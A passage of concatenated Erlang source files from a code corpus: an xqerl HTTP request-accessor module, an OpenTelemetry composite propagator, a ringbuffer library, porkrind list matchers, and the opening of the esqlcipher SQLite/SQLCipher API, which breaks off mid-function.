%% URI of the HTTP Request. If the port is not explicitly specified in the
%% URI, then the default port for the HTTP Scheme is returned (i.e. 21 for
%% FTP, 80 for HTTP and 443 for HTTPS).
port(#{restxq_ctx := Req}) ->
cowboy_req:port(Req);
port(_) ->
no_context_error().
%% 3.3.4 request:path
%% request:path() as xs:string
%% Summary:
%% This function returns the Path component of the URI of the HTTP Request.
path(#{restxq_ctx := Req}) ->
cowboy_req:path(Req);
path(_) ->
no_context_error().
%% 3.3.5 request:query
%% request:query() as xs:string?
%% Summary:
%% This function returns the Query Component of the HTTP Request URI, if
%% there is no query component then an empty sequence is returned.
query(#{restxq_ctx := Req}) ->
case cowboy_req:qs(Req) of
<<>> -> [];
Qs -> Qs
end;
query(_) ->
no_context_error().
%% 3.3.6 request:uri
%% request:uri() as xs:anyURI
%% Summary:
%% This function returns the URI of the HTTP Request.
uri(#{restxq_ctx := Req}) ->
?URI(iolist_to_binary(cowboy_req:uri(Req)));
uri(_) ->
no_context_error().
%% 3.4 Connection Functions
%% Functions that deal with the TCP/IP Connection of the HTTP Request.
%% 3.4.1 request:address
%% request:address() as xs:string
%% Summary:
%% This functions returns the IP address of the server.
address(#{restxq_ctx := Req}) ->
{IpAddress, _} = cowboy_req:sock(Req),
iolist_to_binary(inet:ntoa(IpAddress));
address(_) ->
no_context_error().
%% 3.4.2 request:remote-hostname
%% request:remote-hostname() as xs:string
%% Summary:
%% This functions returns the fully qualified hostname of the client or the
%% last proxy that sent the HTTP Request. If the name of the remote host
%% cannot be established, or an implementation chooses not to establish the
%% remote hostname, this method behaves as request:remote-address(), and
%% returns the IP address.
remote_hostname(#{restxq_ctx := Req}) ->
{IpAddress, _Port} = cowboy_req:peer(Req),
case inet:gethostbyaddr(IpAddress) of
{ok, Hostent} ->
iolist_to_binary([Hostent#hostent.h_name]);
{error, _} ->
iolist_to_binary(inet:ntoa(IpAddress))
end;
remote_hostname(_) ->
no_context_error().
%% 3.4.3 request:remote-address
%% request:remote-address() as xs:string
%% Summary:
%% This functions returns the IP address of the client or the last proxy that
%% sent the HTTP Request.
remote_address(#{restxq_ctx := Req}) ->
{IpAddress, _Port} = cowboy_req:peer(Req),
iolist_to_binary(inet:ntoa(IpAddress));
remote_address(_) ->
no_context_error().
%% 3.4.4 request:remote-port
%% request:remote-port() as xs:integer
%% Summary:
%% This functions returns the TCP port of the client socket or the last proxy
%% that sent the HTTP Request.
remote_port(#{restxq_ctx := Req}) ->
{_IpAddress, Port} = cowboy_req:peer(Req),
Port;
remote_port(_) ->
no_context_error().
%% 3.5 HTTP Parameter Functions
%% A HTTP Parameter is defined as either a fragment of the query portion of
%% the HTTP Request URI or the parameter from a submitted HTML Form where the
%% HTTP Request has the Internet Media Type "application/x-www-form-urlencoded".
%% 3.5.1 request:parameter-names
%% request:parameter-names() as xs:string*
%% Summary:
%% This function returns a Sequence containing the names of Parameters
%% available from the HTTP Request.
parameter_names(#{restxq_ctx := Req}) ->
ParsedQs = cowboy_req:parse_qs(Req),
[K || {K, _} <- ParsedQs];
parameter_names(_) ->
no_context_error().
%% 3.5.2 request:parameter
%% request:parameter($parameter-name as xs:string) as xs:string*
%% Summary:
%% This function returns a Sequence containing the values of the named HTTP
%% Parameter in the HTTP Request. If there is no such parameter in the HTTP
%% Request, then an empty sequence is returned.
parameter(#{restxq_ctx := Req}, Param) when is_binary(Param) ->
ParsedQs = cowboy_req:parse_qs(Req),
Found = proplists:get_all_values(Param, ParsedQs),
lists:map(
fun
(true) -> <<>>;
(I) -> I
end,
Found
);
parameter(#{restxq_ctx := _} = Ctx, Param) ->
parameter(Ctx, xqerl_types:cast_as(Param, 'xs:string'));
parameter(_, _) ->
no_context_error().
%% request:parameter($parameter-name as xs:string,
%% $default as xs:string) as xs:string
%% Summary:
%% This function returns a Sequence containing the values of the named HTTP
%% Parameter in the HTTP Request. If there is no such parameter in the HTTP
%% Request, then the value specified in $default is returned instead.
parameter(#{restxq_ctx := Req}, Param, Default) when is_binary(Param), is_binary(Default) ->
ParsedQs = cowboy_req:parse_qs(Req),
Found = proplists:get_all_values(Param, ParsedQs),
case Found of
[] ->
Default;
_ ->
lists:map(
fun
(true) -> <<>>;
(I) -> I
end,
Found
)
end;
parameter(#{restxq_ctx := _} = Ctx, Param, Default) ->
parameter(
Ctx,
xqerl_types:cast_as(Param, 'xs:string'),
xqerl_types:cast_as(Default, 'xs:string')
);
parameter(_, _, _) ->
no_context_error().
%% 3.6 HTTP Header Functions
%% 3.6.1 request:header-names
%% request:header-names() as xs:string+
%% Summary:
%% This function returns a Sequence containing the names of the HTTP Headers
%% available from the HTTP Request.
header_names(#{restxq_ctx := Req}) ->
ParsedQs = cowboy_req:headers(Req),
maps:keys(ParsedQs);
header_names(_) ->
no_context_error().
%% 3.6.2 request:header
%% request:header($header-name as xs:string) as xs:string?
%% Summary:
%% This function returns the value of the named HTTP Header in the HTTP
%% Request. If there is no such header, then an empty sequence is returned.
header(#{restxq_ctx := Req}, Name) when is_binary(Name) ->
cowboy_req:header(string:lowercase(Name), Req, []);
header(#{restxq_ctx := _} = Ctx, Name) ->
header(Ctx, xqerl_types:cast_as(Name, 'xs:string'));
header(_, _) ->
no_context_error().
%% request:header($header-name as xs:string, $default as xs:string) as xs:string
%% Summary:
%% This function returns the value of the named HTTP Header in the HTTP
%% Request. If there is no such header, then the value specified in $default
%% is returned instead.
header(#{restxq_ctx := Req}, Name, Default) when is_binary(Name), is_binary(Default) ->
cowboy_req:header(string:lowercase(Name), Req, Default);
header(#{restxq_ctx := _} = Ctx, Name, Default) ->
header(
Ctx,
xqerl_types:cast_as(Name, 'xs:string'),
xqerl_types:cast_as(Default, 'xs:string')
);
header(_, _, _) ->
no_context_error().
%% 3.7 Cookie Functions
%% 3.7.1 request:cookie-names
%% request:cookie-names() as xs:string*
%% Summary:
%% This function returns a Sequence containing the names of the Cookies in
%% the HTTP Headers available from the HTTP Request.
cookie_names(#{restxq_ctx := Req}) ->
ParsedCs = cowboy_req:parse_cookies(Req),
[K || {K, _} <- ParsedCs];
cookie_names(_) ->
no_context_error().
%% 3.7.2 request:cookie
%% request:cookie($cookie-name as xs:string) as xs:string?
%% Summary:
%% This function returns the value of the named Cookie in the HTTP Request.
%% If there is no such cookie, then an empty sequence is returned.
cookie(#{restxq_ctx := Req}, Name) when is_binary(Name) ->
ParsedCs = cowboy_req:parse_cookies(Req),
case lists:keyfind(Name, 1, ParsedCs) of
{_, Token} -> Token;
_ -> []
end;
cookie(#{restxq_ctx := _} = Ctx, Name) ->
cookie(Ctx, xqerl_types:cast_as(Name, 'xs:string'));
cookie(_, _) ->
no_context_error().
%% request:cookie($cookie-name as xs:string, $default as xs:string) as xs:string
%% Summary:
%% This function returns the value of the named Cookie in the HTTP Request.
%% If there is no such cookie, then the value specified in $default is
%% returned instead.
cookie(#{restxq_ctx := Req}, Name, Default) when is_binary(Name), is_binary(Default) ->
ParsedCs = cowboy_req:parse_cookies(Req),
case lists:keyfind(Name, 1, ParsedCs) of
{_, Token} -> Token;
_ -> Default
end;
cookie(#{restxq_ctx := _} = Ctx, Name, Default) ->
cookie(
Ctx,
xqerl_types:cast_as(Name, 'xs:string'),
xqerl_types:cast_as(Default, 'xs:string')
);
cookie(_, _, _) ->
no_context_error().
-define(Q(V), #xqAtomicValue{
type = 'xs:QName',
value = #qname{
namespace = ?ERRNS,
prefix = ?ERRPX,
local_name = V
}
}).
no_context_error() ->
E = #xqError{
description = <<"Not in an HTTP context.">>,
name = ?Q(<<"REDY0001">>)
},
throw(E). | src/xqerl_mod_exquery_request.erl | 0.520496 | 0.400456 | xqerl_mod_exquery_request.erl | starcoder |
%%%------------------------------------------------------------------------
%% Copyright 2020, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc A Composite TextMap Propagator is a Propagator that performs run
%% multiple TextMap Propagators in a specified order.
%%
%% An example of creating a Composite TextMap Propagator to inject and
%% extract Baggage and TraceContext:
%%
%% ```
%% Propagator = otel_propagator_text_map_composite:create([trace_context, baggage]),
%% otel_propagator_text_map:extract(Propagator, Carrier)
%% '''
%% @end
%%%-------------------------------------------------------------------------
-module(otel_propagator_text_map_composite).
-behaviour(otel_propagator_text_map).
-export([create/1,
fields/1,
inject/4,
extract/5,
report_cb/1]).
-include_lib("kernel/include/logger.hrl").
create(Propagators) ->
{?MODULE, otel_propagator:builtins_to_modules(Propagators)}.
fields(Propagators) ->
lists:flatmap(fun(Propagator) ->
otel_propagator_text_map:fields(Propagator)
end, Propagators).
-spec inject(Context, Carrier, CarrierSetFun, Injectors) -> Carrier
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierSetFun :: otel_propagator_text_map:carrier_set(),
Injectors :: [otel_propagator_text_map:t()].
inject(Context, Carrier, CarrierSetFun, Injectors) ->
run_injectors(Context, Injectors, Carrier, CarrierSetFun).
-spec extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Extractors) -> Context
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierKeysFun :: otel_propagator_text_map:carrier_keys(),
CarrierGetFun :: otel_propagator_text_map:carrier_get(),
Extractors :: [otel_propagator_text_map:t()].
extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Extractors) ->
run_extractors(Context, Extractors, Carrier, CarrierKeysFun, CarrierGetFun).
run_extractors(Context, Extractors, Carrier, CarrierKeysFun, CarrierGetFun) when is_list(Extractors) ->
lists:foldl(fun(Propagator, ContextAcc) ->
try otel_propagator_text_map:extract_to(ContextAcc, Propagator, Carrier, CarrierKeysFun, CarrierGetFun)
catch
C:E:S ->
?LOG_INFO(#{extractor => Propagator, carrier => Carrier,
class => C, exception => E, stacktrace => S},
#{report_cb => fun ?MODULE:report_cb/1}),
ContextAcc
end
end, Context, otel_propagator:builtins_to_modules(Extractors)).
run_injectors(Context, Injectors, Carrier, Setter) when is_list(Injectors) ->
lists:foldl(fun(Propagator, CarrierAcc) ->
try otel_propagator_text_map:inject_from(Context, Propagator, CarrierAcc, Setter)
catch
C:E:S ->
?LOG_INFO(#{injector => Propagator, carrier => CarrierAcc,
class => C, exception => E, stacktrace => S},
#{report_cb => fun ?MODULE:report_cb/1}),
CarrierAcc
end
end, Carrier, otel_propagator:builtins_to_modules(Injectors)).
report_cb(#{extractor := Propagator, carrier := _Carrier,
class := Class, exception := Exception, stacktrace := StackTrace}) ->
{"text map propagator failed to extract from carrier: propagator=~ts exception=~ts",
[Propagator, otel_utils:format_exception(Class, Exception, StackTrace)]};
report_cb(#{injector := Propagator, carrier := _Carrier,
class := Class, exception := Exception, stacktrace := StackTrace}) ->
{"text map propagator failed to inject to carrier: propagator=~ts exception=~ts",
[Propagator, otel_utils:format_exception(Class, Exception, StackTrace)]}. | apps/opentelemetry_api/src/otel_propagator_text_map_composite.erl | 0.669745 | 0.42471 | otel_propagator_text_map_composite.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @copyright 2021 <NAME>
%% @doc Ringbuffer implements a length limited queue. In systems this is
%% often implemented as a ring, or cylic, buffer. Where the writer can
%% push the reader ahead if the buffer is full.
%%
%% This kind of buffers is useful in situations where you can have
%% surges of writers, with a limited amount of readers. And where it
%% is allowed to drop entries from the queue if the readers can't keep
%% up with the writers.
%%
%% An example is a logging system for a http server, which can handle large
%% bursts of requests. The logger is often limited in its throughput, and it
%% is perfectly ok to drop log entries if that means that the server can
%% handle the peak load.
%%
%% This ring buffer is technically not a ring. It is a size limited buffer,
%% implemented in ets. Its main characteristics are:
%%
%% <ul>
%% <li>Optimized for writes: non locking and non blocking queue writes;</li>
%% <li>Size limited, define the maximum number of entries upon queue creation;</li>
%% <li>Readers are synchronized to prevent race conditions;</li>
%% <li>Readers return the number of entries that were lost due to too
%% fast writers;</li>
%% <li>As many queues as needed.</li>
%% </ul>
%%
%% Copyright 2021 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(ringbuffer).
-export([
start/0,
new/2,
delete/1,
write/2,
read/1
]).
-type ringbuffer() :: term().
-export_type([ringbuffer/0]).
%% Start the ringbuffer application
start() ->
application:start(ringbuffer).
%% @doc Create a new named buffer of Size entries. The name must be unique for all ets tables.
%% The name must be an atom, and is used for the name of the ets table. A process owning the
%% ets table and synchronizing the readers is added to <tt>ringbuffer_sup</tt>.
-spec new( Name :: atom(), Size :: pos_integer() ) -> {ok, pid()} | {error, term()}.
new( Name, Size ) ->
ringbuffer_sup:start_child(Name, Size).
%% @doc Delete a named ringbuffer, all queued data is destroyed. The ets table and the
%% synchronizing process are deleted.
-spec delete( Name :: atom() ) -> ok | {error, not_found}.
delete(Name) ->
ringbuffer_sup:stop_child(Name).
%% @doc Add an entry to the named ringbuffer. Never fails, if the ringbuffer
%% is full then older entries are overwritten.
-spec write( Name :: atom(), Payload :: term() ) -> ok.
write(Name, Payload) ->
ringbuffer_process:write(Name, Payload).
%% @doc Read the next entry from the named ringbuffer. Return the number of skipped entries and
%% the payload of the entry read. An entry is skipped if the readers are falling behind the
%% writers by more that the size of the buffer. <tt>{error, empty}</tt> is returned if the
%% buffer is empty.
-spec read( Name :: atom() ) -> {ok, {non_neg_integer(), term()}} | {error, empty}.
read(Name) ->
ringbuffer_process:read(Name). | src/ringbuffer.erl | 0.658308 | 0.520131 | ringbuffer.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind_lists).
-include("porkrind_internal.hrl").
-export([
has_item/1,
has_items/1,
empty/0
]).
has_item(Matcher0) ->
Matcher = porkrind_util:maybe_wrap(Matcher0),
M = #'porkrind.matcher'{
name = has_item,
args = [Matcher0],
match = fun(Values) ->
case has_item_int(Values, Matcher) of
ok ->
ok;
nomatch ->
?PR_FAIL({no_match, Values})
end
end,
reason = fun({no_match, Values}) ->
Prefix = io_lib:format("~w has no item matching ", [Values]),
[Prefix, porkrind:describe(Matcher)]
end
},
porkrind_logic:all_of([
porkrind_types:is_list(),
M
]).
has_item_int([], _Matcher) ->
nomatch;
has_item_int([Value | Rest], Matcher) ->
case porkrind:check(Value, Matcher) of
ok ->
ok;
{assertion_failed, _} ->
has_item_int(Rest, Matcher)
end.
has_items(Matchers0) ->
Matchers = lists:map(fun porkrind_util:maybe_wrap/1, Matchers0),
M = #'porkrind.matcher'{
name = has_items,
args = [Matchers0],
match = fun(Values) ->
lists:foreach(fun(Matcher) ->
case has_item_int(Values, Matcher) of
ok ->
ok;
nomatch ->
?PR_FAIL({nomatch, Values, Matcher})
end
end, Matchers)
end,
reason = fun({nomatch, Values, Matcher}) ->
Prefix = io_lib:format("~w has no item matching ", [Values]),
[Prefix, porkrind:describe(Matcher)]
end
},
porkrind_logic:all_of([
porkrind_types:is_list(),
M
]).
empty() ->
M = #'porkrind.matcher'{
name = empty,
args = [],
match = fun(Value) ->
if length(Value) == 0 -> ok; true ->
?PR_FAIL({notempty, Value})
end
end,
reason = fun({notempty, Value}) ->
io_lib:format("~p is not an empty list", [Value])
end
},
porkrind_logic:all_of([
porkrind_types:is_list(),
M
]). | src/porkrind_lists.erl | 0.627381 | 0.469703 | porkrind_lists.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @author <NAME> <<EMAIL>>
%% @copyright 2011 - 2021 <NAME>, <NAME>
%% @version 2.0.0-rc.3
%% @doc Erlang API for sqlite3 and sqlcipher databases.
%% This is an adaptation of Maas-Maarten Zeeman's esqlite package for
%% <a href="https://www.zetetic.net/sqlcipher/">sqlcipher</a> encrypted sqlite3
%% databases.
%%
%% All functions (except {@link is_encrypted/1}) take an optional `Timeout'
%% argument. The default value for this timeout is 5 seconds (`5000').
%% Note that <b>`Timeout' is merely a lower bound</b>. Several functions call
%% multiple lower level calls, in which case <i>each</i> of those has is given
%% that timeout. Thus, the actual timeout might be several times the value
%% of `Timeout' for some functions.
%%
%% To open or create a database, use either {@link open/2} or
%% {@link open_encrypted/3}. These return a database connection that can be used
%% in the other functions and should be closed afterwards using {@link close/2}.
%%
%% == Queries ==
%% One-off queries that do not return anything can be executed using
%% {@link exec/3}, {@link exec/4} (with {@section Query Parameters}), or
%% {@link insert/3} (which returns the row id of the row inserted last).
%%
%% In most cases, however, you'll want to use <i>prepared statemtents</i> that
%% can contain {@section Query Parameters}. These statements are created using
%% {@link prepare/3}. If it contains parameters, you can then bind values to
%% those using {@link bind/3} (you can do both in one step using
%% {@link prepare_bind/4}. Afterwards, you can run the statement using
%% {@link run/2} (if you don't care about any rows that are possibly returned),
%% or the `fetch' family ({@link fetch_one/2}, {@link fetch_chunk/3},
%% {@link fetch_all/3}). You can use {@link column_names/2} and
%% {@link column_types/2} on a prepared statement to get the actual names and
%% types of the columns that will be returned by it. Using {@link reset/3}, the
%% prepared statement's initial state will be restored and you can run it once
%% more.
%%
%% Additionally, there is the {@link q/4} and the {@link foreach/5} and
%% {@link map/5} higher-order functions. These do not return {ok, _} or
%% {error, _} tuples; if errors occur, they are thrown.
%%
%% === Query Parameters ===
%% SQLite statements can have parameters that values can be bound to. They take
%% the following forms
%% <ul>
%% <li>`?': Unnamed/anonymous parameters,</li>
%% <li>`?NNN', where `NNN' is a positive integer: Numbered parameters, and</li>
%% <li>`:AAA', where `AAA' is an alphanumeric identifier. <small><i>(sqlite's
%% `@AAA' and `$AAA' forms are also supported but discouraged).</i></small></li>
%% </ul>
%% Prefer numbered or named over anonymous parameters and <b>do not mix named
%% and numbered parameters!</b> See {@link bind/3} for further details!
%%
%% The following <a href="https://www.sqlite.org/datatype3.html">data types</a>
%% are supported by sqlite3:
%% <ul>
%% <li>`INTEGER': for these, just use regular Erlang integers</li>
%% <li>`REAL': Erlang floats</li>
%% <li>`TEXT': Only utf-8 encoded binaries, not strings/charlists should be used
%% for these! iolists are allowed.</li>
%% <li>`BLOB': Any binary can be stored exactly as is into a blob. The can be
%% passed as ``{'$blob', <<"binary data">>}''.</li>
%% <li>`NULL': These are translated to the atom `nil'.</li>
%% </ul>
%% Note that sqlite3 does not have a boolean data type. Use integers.
%% Values are translated between Erlang and sqlite3 data types when `bind'ing or
%% `fetch'ing. Trying to `bind' any other types, such as atoms or booleans, will
%% result in an error.
%% Copyright 2011 - 2021 <NAME>, <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(esqlcipher).
-author("<NAME> <<EMAIL>>").
-author("<NAME> <<EMAIL>>").
%% higher-level export
-export([open/1, open/2,
open_encrypted/2, open_encrypted/3,
close/1, close/2,
is_encrypted/1,
rekey/2, rekey/3,
exec/2, exec/3, exec/4,
insert/2, insert/3,
prepare/2, prepare/3,
bind/2, bind/3,
prepare_bind/3, prepare_bind/4,
reset/1, reset/2, reset/3,
run/1, run/2,
fetch_one/1, fetch_one/2,
fetch_chunk/2, fetch_chunk/3,
fetch_all/1, fetch_all/2, fetch_all/3,
changes/1, changes/2,
column_names/1, column_names/2,
column_types/1, column_types/2,
get_autocommit/1, get_autocommit/2,
set_update_hook/2, set_update_hook/3,
q/2, q/3, q/4,
map/3, map/4, map/5,
foreach/3, foreach/4, foreach/5
]).
-define(DEFAULT_TIMEOUT, 5000).
-define(DEFAULT_CHUNK_SIZE, 5000).
%% How many times to retry fetching from a busy database. 0 = fail immediately when busy
-define(MAX_TRIES, 5).
-type connection() :: {connection, reference(), plaintext | encrypted}.
%% Database connection type.
%% Returned by {@link open/2} and {@link open_encrypted/3}.
-type connection_plain() :: {connection, reference(), plaintext}.
%% Unencrypted database connection type.
-type connection_enc() :: {connection, reference(), encrypted}.
%% Encrypted database connection type.
-type statement() :: {statement, reference(), connection()}.
%% Prepared statement type.
%% Returned by {@link prepare/3} or {@link prepare_bind/4}.
-type sqlite_error() :: {error, {atom(), string()}}.
%% Error return type.
%% Contains an error id atom and a reason/error message.
-type sql() :: iodata().
%% SQL string type.
-type sql_value() :: number() | nil | iodata() | {'$blob', iodata()}.
%% SQL value type.
-type bind_value() :: sql_value() | {pos_integer() | atom(), sql_value()}.
%% List of values for statement parameters (see {@link bind/3}).
-type row() :: [sql_value()].
%% SQL row type.
-type map_function(ReturnType) :: fun((Row :: row()) -> ReturnType) | fun((ColNames :: [binary()], Row :: row()) -> ReturnType).
%% Type of functions used in {@link map/5}.
-type foreach_function() :: fun((Row :: row()) -> any()) | fun((ColNames :: [binary()], Row :: row()) -> any()).
%% Type of functions used in {@link foreach/5}.
%% @equiv open(Filename, 5000)
-spec open(iodata()) -> {ok, connection_plain()} | sqlite_error().
open(Filename) ->
open(Filename, ?DEFAULT_TIMEOUT).
%% @doc Open an unencrypted database connection.
%% If `Filename' doesn't exist, it will be created. You can also open an
%% in-memory database that will be destroyed after closing by giving `:memory:'
%% as the Filename. <a href="https://www.sqlite.org/uri.html">URI filenames</a>
%% are allowed as well.
%%
%% The database will be checked by testing whether `sqlite_master' is readable.
%% Unreadable, corrupted or encrypted databases will return an error of the form
%% `{error, {baddb, _}}'.
%%
%% Since sqlcipher is just sqlite3 under the hood, these unencrypted databases
%% are fully compatible with sqlite3.
-spec open(iodata(), timeout()) -> {ok, connection_plain()} | sqlite_error().
open(Filename, Timeout) ->
{ok, Connection} = esqlcipher_nif:start(),
Ref = make_ref(),
ok = esqlcipher_nif:open(Connection, Ref, self(), Filename),
case receive_answer(Ref, Timeout) of
ok ->
Conn = {connection, Connection, plaintext},
case exec("SELECT * FROM main.sqlite_master LIMIT 0;", Conn, Timeout) of
{error, _} ->
ok = close(Conn),
{error, {baddb, "file is encrypted or not a valid database"}};
ok ->
{ok, Conn}
end;
{error, _Msg} = Error ->
Error
end.
%% @equiv open_encrypted(Filename, Key, 5000)
-spec open_encrypted(iodata(), iodata()) -> {ok, connection_enc()} | sqlite_error().
open_encrypted(Filename, Key) ->
open_encrypted(Filename, Key, ?DEFAULT_TIMEOUT).
%% @doc Open an encrypted database connection.
%% If `Filename' doesn't exist, it will be created.
%%
%% The database will be checked by testing whether `sqlite_master' is readable.
%% Unreadable or corrupted databases as well as an incorrect `Key' will
%% return an error of the form `{error, {baddb, _}}'.
%%
%% Normally, the actual database key will be derived from `Key' using PBKDF2
%% key derivation by sqlcipher. However, it's possible to specify a raw byte
%% sequence as a key. This key has to be hex-encoded and can be used by passing
%% ``"x'<KEY>'"'' using a 64 character hex string for a resulting
%% 32 byte key (256 bits). Finally, an exact database salt can be specified as
%% well by passing a 96 character hex string (the last 32 characters will be
%% used as the salt). If the salt is not explicitly provided, it will be
%% generated randomly and stored in the first 16 bytes of the database.
%%
%% Please refer to the
%% <a href="https://www.zetetic.net/sqlcipher/sqlcipher-api/#key">sqlcipher
%% documentation</a> for further information about the generation and usage of
%% encryption keys.
-spec open_encrypted(iodata(), iodata(), timeout()) -> {ok, connection_enc()} | sqlite_error().
open_encrypted(Filename, Key, Timeout) ->
{ok, Connection} = esqlcipher_nif:start(),
Ref = make_ref(),
ok = esqlcipher_nif:open(Connection, Ref, self(), Filename),
case receive_answer(Ref, Timeout) of
ok ->
Conn = {connection, Connection, encrypted},
case key(Key, Conn, Timeout) of
{error, _} = Error ->
ok = close(Conn),
Error;
ok ->
{ok, Conn}
end;
{error, _Msg} = Error ->
Error
end.
%% @equiv close(Connection, 5000)
-spec close(connection()) -> ok | sqlite_error().
close(Connection) ->
close(Connection, ?DEFAULT_TIMEOUT).
%% @doc Close the database connection.
-spec close(Connection :: connection(), timeout()) -> ok | sqlite_error().
close({connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:close(Connection, Ref, self()),
receive_answer(Ref, Timeout).
%% @doc Whether a database is encrypted.
%% Returns true if the database connection is to an encrypted database, false
%% if it's a plaintext database
-spec is_encrypted(Connection :: connection()) -> boolean().
is_encrypted({connection, _, encrypted}) -> true;
is_encrypted({connection, _, plaintext}) -> false.
%% @doc Unlock database and test whether the key is correct.
%% Must be called before the database is written to.
%% @private
-spec key(iodata(), connection(), timeout()) -> ok | sqlite_error().
key(Key, {connection, Conn, encrypted}=Connection, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:key(Conn, Ref, self(), Key),
case receive_answer(Ref, Timeout) of
ok ->
% Test whether the given key was correct. If not, this will give an error
case exec("SELECT * FROM main.sqlite_master LIMIT 0;", Connection, Timeout) of
{error, {notadb, _}} ->
{error, {baddb, "invalid key or file is not a valid database"}};
{error, _} = Error ->
Error;
ok -> ok
end;
{error, _} -> error
end.
%% @equiv rekey(Key, Connection, 5000)
-spec rekey(iodata(), connection()) -> ok | sqlite_error().
rekey(Key, Connection) ->
rekey(Key, Connection, ?DEFAULT_TIMEOUT).
%% @doc Change the database key.
%% This function cannot be used to encrypt an unencrypted database and will
%% return an error `{error, {rekey_plaintext, _}}' if called on one.
%%
%% @see open_encrypted/3
-spec rekey(iodata(), Connection :: connection(), timeout()) -> ok | sqlite_error().
rekey(_, {connection, _, plaintext}, _Timeout) ->
{error, {rekey_plaintext, "cannot rekey an unencrypted database"}};
rekey(Key, {connection, Conn, encrypted}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:rekey(Conn, Ref, self(), Key),
receive_answer(Ref, Timeout).
%% @equiv set_update_hook(Pid, Connection, 5000)
-spec set_update_hook(pid(), connection()) -> ok.
set_update_hook(Pid, Connection) ->
set_update_hook(Pid, Connection, ?DEFAULT_TIMEOUT).
%% @doc Subscribe to notifications for row updates, insertions and deletions.
%% Messages will come in the shape of
%% `{Action, Database :: binary(), Table :: binary(), Id :: integer()}',
%% where `Action' will be either `insert', `update' or `delete' and `Id' will be
%% the affected row id (i.e. the `INTEGER PRIMARY KEY' if the table has one).
%% `Database' contains the name of the database on which the update occurred,
%% usually `main'.
-spec set_update_hook(pid(), Connection :: connection(), timeout()) -> ok.
set_update_hook(Pid, {connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:set_update_hook(Connection, Ref, self(), Pid),
receive_answer(Ref, Timeout).
%% @equiv exec(Sql, Connection, 5000)
-spec exec(sql(), connection()) -> ok | sqlite_error().
exec(Sql, Connection) ->
exec(Sql, Connection, ?DEFAULT_TIMEOUT).
%% @doc Execute (simple or prepared) SQL statement without returning anything.
%%
%% The second form of invocation (with `Params') is equivalent to
%% {@link exec/4. `exec(Sql, Params, Connection, 5000)'}.
-spec exec(sql(), Connection :: connection(), timeout()) -> ok | sqlite_error()
; (sql(), [bind_value()], connection()) -> ok | sqlite_error().
exec(Sql, {connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:exec(Connection, Ref, self(), Sql),
receive_answer(Ref, Timeout);
exec(Sql, Params, {connection, _, _}=Connection) when is_list(Params) ->
exec(Sql, Params, Connection, ?DEFAULT_TIMEOUT).
%% @doc Execute prepared SQL statement without returning anything.
%% @param Params values that are bound to the SQL statement
-spec exec(sql(), [bind_value()], connection(), timeout()) -> ok | sqlite_error().
exec(Sql, Params, {connection, _, _}=Connection, Timeout) when is_list(Params) ->
{ok, Statement} = prepare_bind(Sql, Params, Connection, Timeout),
run(Statement, Timeout).
%% @equiv insert(Sql, Connection, 5000)
-spec insert(sql(), connection()) -> {ok, integer()} | sqlite_error().
insert(Sql, Connection) ->
insert(Sql, Connection, ?DEFAULT_TIMEOUT).
%% @doc Insert records, returns the last inserted rowid.
%% `Sql' can be any `INSERT' statement. If the table has a column of type
%% `INTEGER PRIMARY KEY', the returned rowid will equal that primary key.
%% See also the sqlite3 docs for
%% <a href="https://sqlite.org/c3ref/last_insert_rowid.html">sqlite3_last_insert_rowid</a>.
-spec insert(sql(), Connection :: connection(), timeout()) -> {ok, integer()} | sqlite_error().
insert(Sql, {connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:insert(Connection, Ref, self(), Sql),
receive_answer(Ref, Timeout).
%% @equiv prepare(Sql, Connection, Timeout)
-spec prepare(sql(), connection()) -> {ok, statement()} | sqlite_error().
prepare(Sql, Connection) ->
prepare(Sql, Connection, ?DEFAULT_TIMEOUT).
%% @doc Prepare (that is, compile) an SQL statement.
%% Value placeholder can then be bound using {@link bind/3}. Or, you can do both
%% in one step using {@link prepare_bind/4}!
-spec prepare(sql(), connection(), timeout()) -> {ok, statement()} | sqlite_error().
prepare(Sql, {connection, Connection, _}=C, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:prepare(Connection, Ref, self(), Sql),
case receive_answer(Ref, Timeout) of
{ok, Stmt} -> {ok, {statement, Stmt, C}};
